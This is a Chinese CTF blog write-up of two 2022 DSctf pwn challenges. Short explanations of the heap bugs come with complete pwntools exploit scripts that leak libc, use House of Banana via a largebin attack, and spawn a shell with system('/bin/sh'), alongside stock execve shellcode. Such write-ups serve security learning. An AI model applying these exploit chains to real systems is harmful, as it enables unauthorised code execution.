---
title: 2022 DSctf pwn 复现
date: 2022-07-20 22:54:59 +0800
categories:
  - ctf比赛
tags:
  - pwn
  - ctf
permalink: /posts/id=36/
pin: false
published:
---

## fuzzerinstrospector

![image-20220722170458078](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220722170458078.png)

chunk内容的前8位逐字节输入

对于unsigned char的格式化输入，不能用修饰符%d，要用一个%hhu。hhu即无符号字符，无符号的char可表示0~255(0~\xff)

这里也不是让你直接写字符，是写字符对应的10进制数

u8可以把一个字符转换为其10进制数

chr可以把10进制(16进制数)转换为其ascall码(无符号字符)

互逆的2种方法`print chr(u8('a'))`

![image-20220722170527074](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220722170527074.png)

这里用到了一个‘+’号绕过，输入'+'会跳过该scanf输入。存在一个漏洞函数，可以执行输入的内容，其参数为第一个chunk。这里如果去切割unsortbin就会留下main_arena+96。

![image-20220722172707782](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220722172707782.png)

```python
# _*_ coding:utf-8 _*_
from pwn import *
context(arch='amd64', os='linux')
# context.log_level = 'debug'
p = process("./fuzzerinstrospector")

elf = ELF("./fuzzerinstrospector")
libc = elf.libc

def dbg():
    gdb.attach(p)
    pause()

#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(str(data))
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda s                  :p.success('%s -> 0x%x' % (s, eval(s)))

sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
#https://www.exploit-db.com/shellcodes
#-----------------------------------------------------------------------------------------

def add(idx,content):
    sla("Your choice: ",1)
    sla("Index: ",idx)
    for i in range(8):
        if content[i] == "+":
            sla("Index: " + str(i) + ":", "+")
        else:
            sla("Index: " + str(i) + ":", u8(content[i]))
    p.sendafter("Bitmap: ", content[8:])

def show(idx):
    sla("Your choice: ",3)
    sla("Index: ",idx)

def dele(idx):# 0x3000
    sla("Your choice: ",4)
    sla("Index: ",idx)

print str(u8('a'))

m = ""
for i in range(0x100):
    m += chr(i)


for i in range(9):
    add(i, str(i)*0x108)

for i in range(9):
    dele(8 - i)

for i in range(8):
    add(i, "+"*8 + m)

show(7)
leak_libc = ""
for i in range(8):
    p.recvuntil('Bit: ')
    leak_libc += chr(int(p.recvuntil("\n")))

libc_base = u64(leak_libc) - 0x3ebeb0
lg('libc_base')
system = libc_base + 0x4f420

dele(0)
add(0, '/bin/sh\x00'+m)
sla("Your choice: ",6)
sl(system)

p.interactive()
```

## eznote

![image-20220722173421181](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220722173421181.png)

题目存在正常退出选项，题目一开始calloc了一个堆块来进行堆块管理，add的时候可以申请8个chunk，在管理堆中发生溢出，导致第一个堆的size头被第8个堆的管理信息给覆盖，可供堆合并，实现堆复用

其它功能只能对前7个堆块进行管理。考虑用houseofbanana，用largebinstack劫持rtld_global为堆地址，这个方法到3.2仍可用。

```python
# _*_ coding:utf-8 _*_
from pwn import *

# context.log_level='debug'
p = process("./eznote")
elf = ELF("./eznote")
libc = elf.libc

def dbg(con=''):
    gdb.attach(p,con)
    pause()

#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(str(data))
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda s                  :p.success('%s -> 0x%x' % (s, eval(s)))

sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
#https://www.exploit-db.com/shellcodes
#-----------------------------------------------------------------------------------------

def add(size,con):
	sla("> ",1)
	sla("Size: ",size)
	p.sendlineafter("Content: ",con)

def edit(idx,con):
	sla("> ",3)
	sla("Idx: ",idx)
	p.sendlineafter("Content: ",con)

def show(idx):
	sla("> ",4)
	sla("Idx: ",idx)


def dele(idx):
	sla("> ",2)
	sla("Idx: ",idx)


add(0x438,'e4l4')# 0
add(0x408,'e4l4')# 1
add(0x448,'e4l4')# 2
add(0x418,'e4l4')# 3
add(0x418,'e4l4')# 4
add(0x408,'e4l4')# 5
add(0x408,'e4l4')# 6
add(0xca1,'e4l4')# 7

dele(0)
dele(3)# 0123

add(0x438,'a')# 0
add(0x408,'a')# 3-1
dele(1)
show(3)
ru('Note3:\n')
key = u64(p.recv(5).ljust(8, '\x00'))
lg('key')
heap_base = key << 12
lg('heap_base')
add(0x448,'a')# 1-2
dele(4)# 3and4
add(0x838,'a')# 4-3and4
dele(2)
show(1)
libc_base = uu64()-0x219ce0
IO_list_all = libc_base + 0x21a680
system = libc_base + 0x50d60
rtld_global = libc_base + 0x264040
setcontext = libc_base + libc.sym['setcontext'] + 61
ret = libc_base + libc.sym['setcontext'] + 0x14E
bin_sh = libc_base + libc.search('/bin/sh\x00').next()
pop_rdi = libc_base + 0x000000000002a3e5
lg('ret')
lg('rtld_global')
lg('IO_list_all')

#-----------------------------------------------------------------
add(0x1000,'a')# 2
edit(1,p64(libc_base+0x21a0e0)*2+p64(0)+p64(rtld_global-0x20))
dele(0)
add(0x1000,'a')# 0
dele(0)
add(0x438, 'a')# 0
#-----------------------------------------------------------------

fake_heap_addr = heap_base + 0xb90
payload  = p64(0) + p64(libc_base + 0x265890)
payload += p64(0) + p64(fake_heap_addr)
payload += p64(setcontext) + p64(ret)

payload += p64(bin_sh)# rsp
payload += p64(ret)
payload += p64(system)
payload += '\x00'*0x80
payload += p64(fake_heap_addr + 0x28 + 0x18)# rdx+0xa0 rsp
payload += p64(pop_rdi)# rdx+0xa8 rcx
payload = payload.ljust(0x100,'\x00')

payload += p64(fake_heap_addr + 0x10 + 0x110)*0x3# 
payload += p64(0x10)
payload = payload.ljust(0x31C - 0x10,'\x00')
payload += '\x08'

edit(1,payload)
edit(3,'\x00'*0x400+p64(fake_heap_addr+0x20))

# dbg("dir ~/glibc/glibc-2.35/")
sla("> ",5)

p.interactive()
```

